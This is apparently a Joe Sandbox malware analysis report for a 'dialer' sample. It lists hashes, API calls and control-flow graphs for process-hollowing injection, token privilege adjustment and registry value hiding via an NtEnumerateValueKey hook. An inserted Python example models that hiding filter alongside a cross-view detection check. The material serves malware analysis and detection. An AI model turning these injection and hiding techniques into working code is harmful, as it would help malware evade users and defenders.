                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocProcess$EnumProcessesSleep
                                                                  • String ID:
                                                                  • API String ID: 3676546796-0
                                                                  • Opcode ID: c96deb0488732d85c0e234732b40ab3daafc8955a2b60271e324f420789b4ec5
                                                                  • Instruction ID: 932927f610c79799a7423f6de90e0e5c96436069bf88993b9f6edd8e186454c1
                                                                  • Opcode Fuzzy Hash: c96deb0488732d85c0e234732b40ab3daafc8955a2b60271e324f420789b4ec5
                                                                  • Instruction Fuzzy Hash: B81172B270061196E716DB17F81476A76A6F7C9FC1F558028EF8207B78CE3AD884CB00

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
                                                                  • String ID:
                                                                  • API String ID: 1323846700-0
                                                                  • Opcode ID: 9ff41f5b47486c21fa891594cf0c33ae277b6b992257bec1fa520ef4309fdbd8
                                                                  • Instruction ID: c66517cf2b2c161b5e7adf19ff96308ebd974c614c1f63983815515aa541087b
                                                                  • Opcode Fuzzy Hash: 9ff41f5b47486c21fa891594cf0c33ae277b6b992257bec1fa520ef4309fdbd8
                                                                  • Instruction Fuzzy Hash: DD114CB1B0564086FB16DF27B84439A66A1EB8DBD4F488028FF0903777EE39C486C704

                                                                  Control-flow Graph (rendered graph not extracted; basic-block address ranges and edges follow)
                                                                  control_flow_graph 252 140002d40-140002d44 call 140002d54 254 140002d49-140002d4b ExitProcess 252->254
                                                                  APIs
                                                                    • Part of subcall function 0000000140002D54: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002D7C
                                                                    • Part of subcall function 0000000140002D54: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002D8C
                                                                    • Part of subcall function 0000000140002D54: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002DA6
                                                                    • Part of subcall function 0000000140002D54: LookupPrivilegeValueW.ADVAPI32 ref: 0000000140002DBD
                                                                    • Part of subcall function 0000000140002D54: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002DF5
                                                                    • Part of subcall function 0000000140002D54: GetLastError.KERNEL32 ref: 0000000140002DFF
                                                                    • Part of subcall function 0000000140002D54: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002E08
                                                                    • Part of subcall function 0000000140002D54: RegOpenKeyExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002E31
                                                                    • Part of subcall function 0000000140002D54: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002E61
                                                                    • Part of subcall function 0000000140002D54: RegQueryValueExW.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002E91
                                                                    • Part of subcall function 0000000140002D54: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002EA5
                                                                    • Part of subcall function 0000000140002D54: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002EB3
                                                                    • Part of subcall function 0000000140002D54: GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002EC6
                                                                    • Part of subcall function 0000000140002D54: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,0000000140002D49), ref: 0000000140002ED4
                                                                  • ExitProcess.KERNEL32 ref: 0000000140002D4B
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Heap$OpenValue$AllocQueryToken$AdjustCloseCurrentErrorExitHandleLastLookupPrivilegePrivileges
                                                                  • String ID:
                                                                  • API String ID: 2472495637-0
                                                                  • Opcode ID: 6a20d8ef6d5d0a33946017a04688fae3853965e8bdf45be2cba163fde7849c19
                                                                  • Instruction ID: 59e064767c250cdef6e9f59bcc282425e560d761e872fe105b4542e7c77ad29f
                                                                  • Opcode Fuzzy Hash: 6a20d8ef6d5d0a33946017a04688fae3853965e8bdf45be2cba163fde7849c19
                                                                  • Instruction Fuzzy Hash: E7A002B0A1159041DA09B77674553D91561575C741F100415611547172DD7844954655

                                                                  Control-flow Graph (rendered graph not extracted; basic-block address ranges and edges follow)
                                                                  control_flow_graph 261 1400031d8-1400031f9 262 1400033f1-1400033f7 261->262 263 1400031ff 261->263 266 14000356d-140003591 ReadFile 262->266 267 1400033fd-140003400 262->267 264 140003205-14000320b 263->264 265 14000335f-140003397 GetProcessHeap HeapAlloc K32EnumProcesses 263->265 268 140003211-140003214 264->268 269 140003356-140003358 ExitProcess 264->269 270 140003626-140003638 265->270 274 14000339d-1400033ae 265->274 266->270 271 140003597-14000359e 266->271 272 140003563-140003568 call 140001f7c 267->272 273 140003406-14000340c 267->273 276 14000321a-14000321d 268->276 277 1400032be-1400032e9 RegOpenKeyExW 268->277 271->270 278 1400035a4-1400035df GetProcessHeap HeapAlloc call 140001cf0 271->278 272->270 279 140003412-140003415 273->279 280 140003508-14000351b call 1400020fc 273->280 274->270 281 1400033b4-1400033ea call 140001860 * 2 274->281 286 140003223-140003226 276->286 287 1400032af-1400032b9 276->287 282 140003327-140003351 call 14000217c * 2 call 140001f7c call 1400017a0 call 14000200c 277->282 283 1400032eb-140003321 RegDeleteValueW * 3 277->283 304 1400035e1-1400035e7 278->304 305 140003612-140003620 GetProcessHeap HeapFree 278->305 289 140003454-140003465 call 1400020fc 279->289 290 140003417-14000341d 279->290 280->270 307 140003521-140003530 call 1400020fc 280->307 316 1400033ec 281->316 282->270 283->282 295 1400032a2-1400032aa 286->295 296 140003228-14000322e 286->296 287->270 289->270 308 14000346b-14000348d ReadFile 289->308 290->270 298 140003423-14000344d call 140002c64 call 140002c90 ExitProcess 290->298 295->270 296->270 303 140003234-140003258 ReadFile 296->303 303->270 311 14000325e-140003265 303->311 304->305 312 1400035e9-1400035fb 304->312 305->270 307->270 329 140003536-14000355e ShellExecuteW 307->329 308->270 315 140003493-14000349a 308->315 311->270 318 14000326b-14000329d call 140001860 * 2 311->318 319 140003601-140003609 312->319 320 1400035fd-1400035ff 312->320 315->270 323 1400034a0-1400034de GetProcessHeap HeapAlloc ReadFile 315->323 316->270 318->270 319->305 327 14000360b 319->327 320->319 326 14000360d call 140001eec 320->326 323->305 330 1400034e4-1400034f0 323->330 326->305 327->312 329->270 330->305 334 1400034f6-140003503 call 140002434 330->334 334->305
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Open$CloseDeleteFileHandleInformationTokenValue$AllocAuthorityExitHeapLocalName$CountEnumErrorFindFreeLastModulePathProcessesQueryReadWow64lstrlen
                                                                  • String ID: SOFTWARE$dialerdll32$dialerdll64$dialerstager$dialersvc32$dialersvc64$open
                                                                  • API String ID: 4225498131-1247716241
                                                                  • Opcode ID: 422f40bd223bb63f26ace592334ba55c24233faa36fd25942569ee90e96e746c
                                                                  • Instruction ID: e08a93284e424f9f2f03302153dd23542788a9e373c29e46626a4198fc3bbd5f
                                                                  • Opcode Fuzzy Hash: 422f40bd223bb63f26ace592334ba55c24233faa36fd25942569ee90e96e746c
                                                                  • Instruction Fuzzy Hash: E0B128F1604A8096EB7BDF27F8543EA22A9F74C7C4F458125BB0A47AB6DE798605C700

                                                                  Control-flow Graph (rendered graph not extracted; basic-block address ranges and edges follow)
                                                                  control_flow_graph 343 140002434-140002465 344 140002922 343->344 345 14000246b-140002478 343->345 348 140002924-140002937 344->348 346 14000247a-140002484 345->346 347 140002490 345->347 346->344 349 14000248a-14000248e 346->349 350 140002493-140002496 347->350 349->350 351 1400024d5-1400024d8 350->351 352 140002498-1400024b6 call 1400020cc 350->352 353 1400024de-14000253a CreateProcessW 351->353 352->344 367 1400024bc-1400024c8 352->367 356 1400028d7-1400028df 353->356 357 140002540-140002557 353->357 358 1400028e1-1400028f2 OpenProcess 356->358 359 1400028ff 356->359 360 140002718-140002755 call 1400020cc VirtualAllocEx 357->360 361 14000255d-14000259b call 1400020cc VirtualAllocEx 357->361 363 140002902-14000290d 358->363 364 1400028f4-1400028f9 TerminateProcess 358->364 359->363 374 1400028d1 360->374 375 14000275b-140002777 WriteProcessMemory 360->375 361->374 376 1400025a1-1400025bd WriteProcessMemory 361->376 363->344 368 14000290f-140002916 363->368 364->359 367->344 371 1400024ce 367->371 368->353 371->351 374->356 375->374 377 14000277d-1400027a1 VirtualProtectEx 375->377 376->374 378 1400025c3-1400025e7 VirtualProtectEx 376->378 377->374 379 1400027a7-1400027b5 377->379 378->374 380 1400025ed-1400025fb 378->380 383 140002846-140002865 VirtualAlloc 379->383 384 1400027bb 379->384 381 140002601 380->381 382 14000268c-1400026ab VirtualAlloc 380->382 385 140002604-140002626 WriteProcessMemory 381->385 382->374 387 1400026b1-1400026c8 GetThreadContext 382->387 383->374 388 140002867-14000287d Wow64GetThreadContext 383->388 386 1400027be-1400027e0 WriteProcessMemory 384->386 385->374 390 14000262c-140002637 385->390 386->374 391 1400027e6-1400027f1 386->391 387->374 392 1400026ce-1400026f2 WriteProcessMemory 387->392 388->374 389 14000287f-1400028a1 WriteProcessMemory 388->389 389->374 393 1400028a3-1400028b7 Wow64SetThreadContext 389->393 394 140002639-14000263d 390->394 395 14000263f 390->395 396 1400027f3-1400027f7 391->396 397 1400027f9 391->397 392->374 398 1400026f8-140002713 SetThreadContext 392->398 399 1400028bd-1400028bf 393->399 400 140002643-140002672 call 140002938 VirtualProtectEx 394->400 395->400 401 1400027fd-14000282c call 140002938 VirtualProtectEx 396->401 397->401 398->399 399->374 402 1400028c1-1400028cf ResumeThread 399->402 400->374 408 140002678-140002686 400->408 401->374 409 140002832-140002840 401->409 402->374 405 14000291b-140002920 402->405 405->348 408->382 408->385 409->383 409->386
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: Process$Virtual$MemoryWrite$Thread$AllocContextProtect$Wow64$CreateOpenResumeTerminate
                                                                  • String ID: @$NtUnmapViewOfSection$RtlGetVersion$h
                                                                  • API String ID: 1423830022-1371749706
                                                                  • Opcode ID: bb03c724c0a37b745e04d1c2cc94b97180df235d5c9c7911ccdb9c72fcca1860
                                                                  • Instruction ID: 66eadde3e23c78db0b2c2a162faeb5bceed69f312705dc0718e950d303e6fa69
                                                                  • Opcode Fuzzy Hash: bb03c724c0a37b745e04d1c2cc94b97180df235d5c9c7911ccdb9c72fcca1860
                                                                  • Instruction Fuzzy Hash: 94D17EB670164187EB61CB67F84479AB7A0FB88BD4F004025EF8947BA4DF78D599CB04

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                  • String ID: d
                                                                  • API String ID: 2005889112-2564639436
                                                                  • Opcode ID: 3db9478a101194b55b940351d2e6744c1199954fa76c07e8abb2f2f05a3be27a
                                                                  • Instruction ID: cbe0a9e96035c6652df35f1bebe582e7c0167c489293dce8c24ece8bd57d0938
                                                                  • Opcode Fuzzy Hash: 3db9478a101194b55b940351d2e6744c1199954fa76c07e8abb2f2f05a3be27a
                                                                  • Instruction Fuzzy Hash: C35128B2604B8486EB56DF62F4483AA77A1F78CBD5F444124EB4A07B79DF38C555C700
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
                                                                  • String ID:
                                                                  • API String ID: 4184240511-0
                                                                  • Opcode ID: 52a031b336cdca2811222aac7cadf92182542813affb2ed5c5bed703cbbb13aa
                                                                  • Instruction ID: d557f572b548448d46b4b4e400aa3a3f0eed60a23b27f74265f55533597505c8
                                                                  • Opcode Fuzzy Hash: 52a031b336cdca2811222aac7cadf92182542813affb2ed5c5bed703cbbb13aa
                                                                  • Instruction Fuzzy Hash: D14148B2700A859AE711CF6AE8843DD73B1FB89B99F445225FF0A43A69DF38C159C304
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                  • String ID: d
                                                                  • API String ID: 3743429067-2564639436
                                                                  • Opcode ID: e46bc08d923f3710a6f0b6657d2c3335541900ed0314ce9ea7860df7b3fef6c0
                                                                  • Instruction ID: 42b997484051ce9e6daf6bc3104cf1544be02307d9272190f1dec121864cc25c
                                                                  • Opcode Fuzzy Hash: e46bc08d923f3710a6f0b6657d2c3335541900ed0314ce9ea7860df7b3fef6c0
                                                                  • Instruction Fuzzy Hash: E1412AB2214B84C6E765CF62F4447DA77A1F388B98F448129EB8907B68DF38C589CB40
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: Delete$CloseEnumOpen
                                                                  • String ID: SOFTWARE\dialerconfig
                                                                  • API String ID: 3013565938-461861421
                                                                  • Opcode ID: 3546dc44df7e8b158bd6bb68c849f6718ea14c1894578f294c0a39a5e3694e51
                                                                  • Instruction ID: 46bba928c240728d338613b8de0f0c529c8f41473f23169f90678cf934e6a2b6
                                                                  • Opcode Fuzzy Hash: 3546dc44df7e8b158bd6bb68c849f6718ea14c1894578f294c0a39a5e3694e51
                                                                  • Instruction Fuzzy Hash: 891170B2614A8485E762CF26F8447E923B4F78C7D8F405205EB5D0BAA9DF7CC258CB18
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$Free
                                                                  • String ID:
                                                                  • API String ID: 3168794593-0
                                                                  • Opcode ID: 73bbda701e0c7dde8a9bb72d8052321e3a2b93cd57bfc5b7ac7be5e90a89b24a
                                                                  • Instruction ID: bfc98151d4b55344812eebf6c0d33986cba51fe62d4fd4ad2f52b553ca81b4e9
                                                                  • Opcode Fuzzy Hash: 73bbda701e0c7dde8a9bb72d8052321e3a2b93cd57bfc5b7ac7be5e90a89b24a
                                                                  • Instruction Fuzzy Hash: 4D015AB2600A80D6E705EF67F90438A77A0F78CBC4F494425BB994373ADE38C051C744
                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: AddressHandleModuleProc
                                                                  • String ID: ntdll.dll
                                                                  • API String ID: 1646373207-2227199552
                                                                  • Opcode ID: 194e60043ded67e07100df29ab3cf77ef87a9a245bef3bebfeeac3078f3da2c5
                                                                  • Instruction ID: 25cfabea84f4b80a2e2eb0d312c031e38d099179bfd8722b5fa94ad88c6eb4a5
                                                                  • Opcode Fuzzy Hash: 194e60043ded67e07100df29ab3cf77ef87a9a245bef3bebfeeac3078f3da2c5
                                                                  • Instruction Fuzzy Hash: 71D0C9F871260182EF2AEB6778553E152515B6DBD5F4940209F0647772DE38C0D48218
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocProcess
                                                                  • String ID:
                                                                  • API String ID: 1617791916-0
                                                                  • Opcode ID: 47ff0fd0a0ed3f45e3b7bef41ad735f8b2bd5774596bf556d838e1702c2b3cda
                                                                  • Instruction ID: 1511527892a3fb8eded8389ff9e17f75ca8e9e74a60c21ae91e61c536c9c2234
                                                                  • Opcode Fuzzy Hash: 47ff0fd0a0ed3f45e3b7bef41ad735f8b2bd5774596bf556d838e1702c2b3cda
                                                                  • Instruction Fuzzy Hash: 39E039F170160086E705DB63E80438936E1EB8CB81F858024DA1907371DF7D84D98750
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000044.00000002.1821606470.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                                                  • Associated: 00000044.00000002.1821582967.0000000140000000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821633102.0000000140004000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000044.00000002.1821692361.0000000140007000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_68_2_140000000_dllhost.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$AllocProcess
                                                                  • String ID:
                                                                  • API String ID: 1617791916-0
                                                                  • Opcode ID: c318bc90e8eaf306909f2f681ed70c0ee622173829c7eddc2bb167e283e0ca4a
                                                                  • Instruction ID: 4369636dfc19c6b46be3dddb2077bf5e2e0bd1da0e3c66b1f75a47794e7da392
                                                                  • Opcode Fuzzy Hash: c318bc90e8eaf306909f2f681ed70c0ee622173829c7eddc2bb167e283e0ca4a
                                                                  • Instruction Fuzzy Hash: 78E0E5F1751A0086E70ADB63E80439976E1FB8CB91F898024EA1907731EE3884D98A24

                                                                  Control-flow Graph

                                                                  • Graph for the function at 225dc642990: the entry block calls NtEnumerateValueKey; the loop that follows re-calls NtEnumerateValueKey and then calls 225dc643c74 on each iteration before control reaches the exit block at 225dc642a38.
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: EnumerateValue
                                                                  • String ID:
                                                                  • API String ID: 1749906896-0
                                                                  • Opcode ID: 02ad5e92296fcb81618173faf02e6502a770973b3644f5fa5863a03f8eb30bb4
                                                                  • Instruction ID: 84a77b9bb0afbf59611d0fa3fd5c5f0fab25569c8fb70d3f3086e3ec9d703967
                                                                  • Opcode Fuzzy Hash: 02ad5e92296fcb81618173faf02e6502a770973b3644f5fa5863a03f8eb30bb4
                                                                  • Instruction Fuzzy Hash: 9E21063A31CB6196E375CF8AA84462EB7A4F384F95F628159DE9653B54DF34C481C700

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                                                  • Associated: 00000045.00000002.2939090229.00000225DC640000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939274526.00000225DC656000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939365246.00000225DC661000.00000004.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939456794.00000225DC663000.00000002.00000001.00020000.00000000.sdmp
                                                                  • Associated: 00000045.00000002.2939521092.00000225DC669000.00000002.00000001.00020000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_69_2_225dc640000_winlogon.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                  • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                  • API String ID: 2135414181-2879589442
                                                                  • Opcode ID: 50c73d645853b92a642b33fc6a066fdc959384cfa368f387aec294c2099e88a8
                                                                  • Instruction ID: a2d6af49bfb468c6323ae30e83388f277792ce270a6e7da95958c0977ad93538
                                                                  • Opcode Fuzzy Hash: 50c73d645853b92a642b33fc6a066fdc959384cfa368f387aec294c2099e88a8
                                                                  • Instruction Fuzzy Hash: 50713E7A328E60A6EB109FE9E85869D33B4F784F9AF509111DE4E47B68EF34C444C740
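The two winlogon entries above (the NtEnumerateValueKey loop at 225dc642990 that calls into the StrCmpNIW wrapper at 225dc643c74, and the routine that reads the paths, pid, process_names, service_names, startup, tcp_local, tcp_remote and udp values under SOFTWARE\dialerconfig) describe a user-mode registry hiding filter. The following is an added example, not code from the report or from the sample: it models that filter (call the real enumerator, drop every name that matches the hide list by case-insensitive prefix compare, renumber the rest so the caller sees no gap) and the cross-view check that exposes it. The value names, the hide list and the renumbering strategy are constructed for the example; the sample's hook may differ in detail.

```python
"""Added example, not part of the Joe Sandbox report or of the analysed sample.
Models a hooked NtEnumerateValueKey that hides values by name and shows how a
cross-view comparison (raw hive vs. API view) reveals the hidden entries.
RUN_VALUES and HIDE_LIST are constructed inputs."""
import itertools

STATUS_SUCCESS = 0x00000000
STATUS_NO_MORE_ENTRIES = 0x8000001A   # NTSTATUS returned once the index runs past the last value

# Constructed stand-in for a key's values as stored in the hive (think of a Run key)
RUN_VALUES = ["OneDrive", "DialerSvc", "SecurityHealth", "dialerupdate"]
# Constructed stand-in for the hide list the hook would load from its config key
HIDE_LIST = ["dialer"]


def real_enumerate(values, index):
    """Model of the unhooked enumerator: index -> (status, value name)."""
    if 0 <= index < len(values):
        return STATUS_SUCCESS, values[index]
    return STATUS_NO_MORE_ENTRIES, None


def matches_hide_list(name, hide_list):
    """StrCmpNIW-style test: case-insensitive, compared over the pattern's length."""
    return any(name[:len(p)].casefold() == p.casefold() for p in hide_list)


def hooked_enumerate(values, index, hide_list):
    """Model of the hook: walk the real index space, skip names on the hide
    list, and hand back the index-th *visible* entry so callers see a dense,
    gap-free index space. Returns (status, name) like the real API."""
    seen = 0
    for real_index in itertools.count():
        status, name = real_enumerate(values, real_index)
        if status != STATUS_SUCCESS:
            return status, None              # ran out of real entries
        if matches_hide_list(name, hide_list):
            continue                         # hidden: do not count it
        if seen == index:
            return STATUS_SUCCESS, name
        seen += 1


def enumerate_all(enum_fn):
    """Drive an enumerator the way RegEnumValue callers do: 0, 1, 2, ... until
    the status says there are no more entries."""
    out = []
    for i in itertools.count():
        status, name = enum_fn(i)
        if status != STATUS_SUCCESS:
            break
        out.append(name)
    return out


def hooked_view(values=RUN_VALUES, hide_list=HIDE_LIST):
    """What a process with the hook installed sees for this key."""
    return enumerate_all(lambda i: hooked_enumerate(values, i, hide_list))


def cross_view_diff(values=RUN_VALUES, hide_list=HIDE_LIST):
    """Cross-view check: names present in the raw view (an offline parse of the
    hive file, or an enumeration taken from a process the hook is not injected
    into) but absent from the API view are the hidden values."""
    api_view = set(hooked_view(values, hide_list))
    return [v for v in values if v not in api_view]


if __name__ == "__main__":
    print("API view :", hooked_view())
    print("hidden   :", cross_view_diff())
```

On a real host the raw side of the diff comes from a hive file parsed offline or from a volume shadow copy, never from the same process whose ntdll is hooked; the same comparison applied to the key holding the hide list itself (the report names SOFTWARE\dialerconfig, hive not stated) would surface the configuration the hook reads.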

                                                                  Control-flow Graph

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000045.00000002.2939171436.00000225DC641000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
